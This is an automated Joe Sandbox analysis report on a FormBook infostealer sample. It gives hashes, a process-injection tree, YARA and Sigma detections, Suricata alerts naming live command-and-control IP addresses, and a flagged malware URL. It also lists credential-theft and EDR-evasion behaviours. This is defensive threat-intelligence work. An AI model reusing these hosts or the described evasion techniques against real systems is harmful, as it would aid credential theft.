Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0XLuA614VK.exe

Overview

General Information

Sample name:0XLuA614VK.exe
renamed because original name is a hash value
Original sample name:4399aa607bbc0faabced85f15b59b4d01a50d79da07f8d6bc825e358ad417e52.exe
Analysis ID:1504851
MD5:562cb5dcba0e691bf01ab2c020c0837e
SHA1:3ca5eb915edcce7da20a7b6046055cb11333647e
SHA256:4399aa607bbc0faabced85f15b59b4d01a50d79da07f8d6bc825e358ad417e52
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 0XLuA614VK.exe (PID: 2956 cmdline: "C:\Users\user\Desktop\0XLuA614VK.exe" MD5: 562CB5DCBA0E691BF01AB2C020C0837E)
    • svchost.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\0XLuA614VK.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • sXmdPDASzrmzi.exe (PID: 2672 cmdline: "C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • msiexec.exe (PID: 5304 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • firefox.exe (PID: 2300 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x86b44:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x700e3:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2e755:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17cf4:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d2d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16872:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17672:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\0XLuA614VK.exe", CommandLine: "C:\Users\user\Desktop\0XLuA614VK.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\0XLuA614VK.exe", ParentImage: C:\Users\user\Desktop\0XLuA614VK.exe, ParentProcessId: 2956, ParentProcessName: 0XLuA614VK.exe, ProcessCommandLine: "C:\Users\user\Desktop\0XLuA614VK.exe", ProcessId: 6400, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\0XLuA614VK.exe", CommandLine: "C:\Users\user\Desktop\0XLuA614VK.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\0XLuA614VK.exe", ParentImage: C:\Users\user\Desktop\0XLuA614VK.exe, ParentProcessId: 2956, ParentProcessName: 0XLuA614VK.exe, ProcessCommandLine: "C:\Users\user\Desktop\0XLuA614VK.exe", ProcessId: 6400, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-05T14:24:29.528469+020020507451Malware Command and Control Activity Detected192.168.2.549711199.59.243.22680TCP
            2024-09-05T14:24:53.108803+020020507451Malware Command and Control Activity Detected192.168.2.55719572.52.178.2380TCP
            2024-09-05T14:25:14.634365+020020507451Malware Command and Control Activity Detected192.168.2.55719915.197.240.2080TCP
            2024-09-05T14:25:36.174460+020020507451Malware Command and Control Activity Detected192.168.2.557203199.59.243.22680TCP
            2024-09-05T14:25:58.268529+020020507451Malware Command and Control Activity Detected192.168.2.557207162.0.213.9480TCP
            2024-09-05T14:26:12.167470+020020507451Malware Command and Control Activity Detected192.168.2.55721113.248.151.23780TCP
            2024-09-05T14:26:25.546426+020020507451Malware Command and Control Activity Detected192.168.2.55721534.149.87.4580TCP
            2024-09-05T14:26:38.962807+020020507451Malware Command and Control Activity Detected192.168.2.55721991.203.110.24780TCP
            2024-09-05T14:26:52.280815+020020507451Malware Command and Control Activity Detected192.168.2.55722334.149.87.4580TCP
            2024-09-05T14:27:05.588486+020020507451Malware Command and Control Activity Detected192.168.2.55722772.52.178.2380TCP
            2024-09-05T14:27:19.681884+020020507451Malware Command and Control Activity Detected192.168.2.557231199.59.243.22680TCP
            2024-09-05T14:27:41.175589+020020507451Malware Command and Control Activity Detected192.168.2.557235199.59.243.22680TCP
            2024-09-05T14:27:49.709341+020020507451Malware Command and Control Activity Detected192.168.2.557236199.59.243.22680TCP
            2024-09-05T14:28:02.888098+020020507451Malware Command and Control Activity Detected192.168.2.55724072.52.178.2380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-05T14:24:29.528469+020028554651A Network Trojan was detected192.168.2.549711199.59.243.22680TCP
            2024-09-05T14:24:53.108803+020028554651A Network Trojan was detected192.168.2.55719572.52.178.2380TCP
            2024-09-05T14:25:14.634365+020028554651A Network Trojan was detected192.168.2.55719915.197.240.2080TCP
            2024-09-05T14:25:36.174460+020028554651A Network Trojan was detected192.168.2.557203199.59.243.22680TCP
            2024-09-05T14:25:58.268529+020028554651A Network Trojan was detected192.168.2.557207162.0.213.9480TCP
            2024-09-05T14:26:12.167470+020028554651A Network Trojan was detected192.168.2.55721113.248.151.23780TCP
            2024-09-05T14:26:25.546426+020028554651A Network Trojan was detected192.168.2.55721534.149.87.4580TCP
            2024-09-05T14:26:38.962807+020028554651A Network Trojan was detected192.168.2.55721991.203.110.24780TCP
            2024-09-05T14:26:52.280815+020028554651A Network Trojan was detected192.168.2.55722334.149.87.4580TCP
            2024-09-05T14:27:05.588486+020028554651A Network Trojan was detected192.168.2.55722772.52.178.2380TCP
            2024-09-05T14:27:19.681884+020028554651A Network Trojan was detected192.168.2.557231199.59.243.22680TCP
            2024-09-05T14:27:41.175589+020028554651A Network Trojan was detected192.168.2.557235199.59.243.22680TCP
            2024-09-05T14:27:49.709341+020028554651A Network Trojan was detected192.168.2.557236199.59.243.22680TCP
            2024-09-05T14:28:02.888098+020028554651A Network Trojan was detected192.168.2.55724072.52.178.2380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-05T14:24:45.410661+020028554641A Network Trojan was detected192.168.2.55719272.52.178.2380TCP
            2024-09-05T14:24:47.999882+020028554641A Network Trojan was detected192.168.2.55719372.52.178.2380TCP
            2024-09-05T14:24:50.562697+020028554641A Network Trojan was detected192.168.2.55719472.52.178.2380TCP
            2024-09-05T14:25:06.999734+020028554641A Network Trojan was detected192.168.2.55719615.197.240.2080TCP
            2024-09-05T14:25:09.543696+020028554641A Network Trojan was detected192.168.2.55719715.197.240.2080TCP
            2024-09-05T14:25:12.097318+020028554641A Network Trojan was detected192.168.2.55719815.197.240.2080TCP
            2024-09-05T14:25:28.483319+020028554641A Network Trojan was detected192.168.2.557200199.59.243.22680TCP
            2024-09-05T14:25:31.040913+020028554641A Network Trojan was detected192.168.2.557201199.59.243.22680TCP
            2024-09-05T14:25:33.548178+020028554641A Network Trojan was detected192.168.2.557202199.59.243.22680TCP
            2024-09-05T14:25:50.658954+020028554641A Network Trojan was detected192.168.2.557204162.0.213.9480TCP
            2024-09-05T14:25:53.204047+020028554641A Network Trojan was detected192.168.2.557205162.0.213.9480TCP
            2024-09-05T14:25:55.738624+020028554641A Network Trojan was detected192.168.2.557206162.0.213.9480TCP
            2024-09-05T14:26:04.426223+020028554641A Network Trojan was detected192.168.2.55720813.248.151.23780TCP
            2024-09-05T14:26:06.979323+020028554641A Network Trojan was detected192.168.2.55720913.248.151.23780TCP
            2024-09-05T14:26:09.504074+020028554641A Network Trojan was detected192.168.2.55721013.248.151.23780TCP
            2024-09-05T14:26:17.952179+020028554641A Network Trojan was detected192.168.2.55721234.149.87.4580TCP
            2024-09-05T14:26:20.494766+020028554641A Network Trojan was detected192.168.2.55721334.149.87.4580TCP
            2024-09-05T14:26:23.015896+020028554641A Network Trojan was detected192.168.2.55721434.149.87.4580TCP
            2024-09-05T14:26:31.226240+020028554641A Network Trojan was detected192.168.2.55721691.203.110.24780TCP
            2024-09-05T14:26:33.887796+020028554641A Network Trojan was detected192.168.2.55721791.203.110.24780TCP
            2024-09-05T14:26:36.447900+020028554641A Network Trojan was detected192.168.2.55721891.203.110.24780TCP
            2024-09-05T14:26:44.499385+020028554641A Network Trojan was detected192.168.2.55722034.149.87.4580TCP
            2024-09-05T14:26:47.030980+020028554641A Network Trojan was detected192.168.2.55722134.149.87.4580TCP
            2024-09-05T14:26:49.688095+020028554641A Network Trojan was detected192.168.2.55722234.149.87.4580TCP
            2024-09-05T14:26:57.961604+020028554641A Network Trojan was detected192.168.2.55722472.52.178.2380TCP
            2024-09-05T14:27:00.476532+020028554641A Network Trojan was detected192.168.2.55722572.52.178.2380TCP
            2024-09-05T14:27:03.017249+020028554641A Network Trojan was detected192.168.2.55722672.52.178.2380TCP
            2024-09-05T14:27:11.584928+020028554641A Network Trojan was detected192.168.2.557228199.59.243.22680TCP
            2024-09-05T14:27:14.189519+020028554641A Network Trojan was detected192.168.2.557229199.59.243.22680TCP
            2024-09-05T14:27:17.145172+020028554641A Network Trojan was detected192.168.2.557230199.59.243.22680TCP
            2024-09-05T14:27:33.552885+020028554641A Network Trojan was detected192.168.2.557232199.59.243.22680TCP
            2024-09-05T14:27:36.110585+020028554641A Network Trojan was detected192.168.2.557233199.59.243.22680TCP
            2024-09-05T14:27:38.652932+020028554641A Network Trojan was detected192.168.2.557234199.59.243.22680TCP
            2024-09-05T14:27:55.252464+020028554641A Network Trojan was detected192.168.2.55723772.52.178.2380TCP
            2024-09-05T14:27:57.753496+020028554641A Network Trojan was detected192.168.2.55723872.52.178.2380TCP
            2024-09-05T14:28:00.299708+020028554641A Network Trojan was detected192.168.2.55723972.52.178.2380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-05T14:25:12.097318+020028563181A Network Trojan was detected192.168.2.55719815.197.240.2080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.rigintech.info/ig9u/?V6h=DsbZHDl7ETyucOGSRMDREU0gLqon/JCM1qPnn3cy3RxLEFGk9lVuu2W6wSDxGu+YER8koFm75cmrGcIzTbmZQ3LhDYrene07E1oxIZlh9GtUu7RZMRKLFDCiJnSgV5dMHg==&sH=nVVHdDTx2PSTVJAvira URL Cloud: Label: malware
            Source: http://www.rigintech.info/ig9u/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: 0XLuA614VK.exeReversingLabs: Detection: 60%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 0XLuA614VK.exeJoe Sandbox ML: detected
            Source: 0XLuA614VK.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: msiexec.pdb source: svchost.exe, 00000002.00000003.2171842746.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171888846.000000000303B000.00000004.00000020.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2279705899.00000000010A9000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.00000000010A5000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.000000000109B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000002.00000003.2171842746.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171888846.000000000303B000.00000004.00000020.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2279705899.00000000010A9000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.00000000010A5000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.000000000109B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sXmdPDASzrmzi.exe, 00000003.00000002.4487730096.000000000005E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: 0XLuA614VK.exe, 00000000.00000003.2044530612.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, 0XLuA614VK.exe, 00000000.00000003.2044779565.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203138542.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2111792201.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203138542.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2113590946.0000000003400000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2203188667.00000000040B9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.00000000045AE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.0000000004410000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2212872655.0000000004267000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 0XLuA614VK.exe, 00000000.00000003.2044530612.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, 0XLuA614VK.exe, 00000000.00000003.2044779565.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2203138542.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2111792201.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203138542.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2113590946.0000000003400000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000004.00000003.2203188667.00000000040B9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.00000000045AE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.0000000004410000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2212872655.0000000004267000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000045EC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488021727.0000000002663000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004A3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2496207434.000000003B6FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000045EC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488021727.0000000002663000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004A3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2496207434.000000003B6FC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F8DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F8DBBE
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F5C2A2 FindFirstFileExW,0_2_00F5C2A2
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F968EE FindFirstFileW,FindClose,0_2_00F968EE
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00F9698F
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F8D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F8D076
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F8D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F8D3A9
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F99642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F99642
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F9979D
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F99B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00F99B2B
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F95C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00F95C97
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0012BF20 FindFirstFileW,FindNextFileW,FindClose,4_2_0012BF20
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 4x nop then pop edi3_2_06A29F51
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 4x nop then pop edi3_2_06A28C87
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 4x nop then pop edi3_2_06A28D01
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 4x nop then xor eax, eax3_2_06A2D295
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 4x nop then mov esp, ebp3_2_06A27A61
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 4x nop then pop edi3_2_06A280CF
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeCode function: 4x nop then pop ebx3_2_06A29918
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then xor eax, eax4_2_00119760
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov ebx, 00000004h4_2_041B053E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57195 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57195 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57198 -> 15.197.240.20:80
            Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:57198 -> 15.197.240.20:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57194 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57193 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49711 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49711 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57196 -> 15.197.240.20:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57203 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57203 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57202 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57207 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57207 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57205 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57199 -> 15.197.240.20:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57199 -> 15.197.240.20:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57206 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57201 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57215 -> 34.149.87.45:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57224 -> 72.52.178.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57204 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57200 -> 199.59.243.226:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57211 -> 13.248.151.237:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57211 -> 13.248.151.237:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57215 -> 34.149.87.45:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57234 -> 199.59.243.226:80
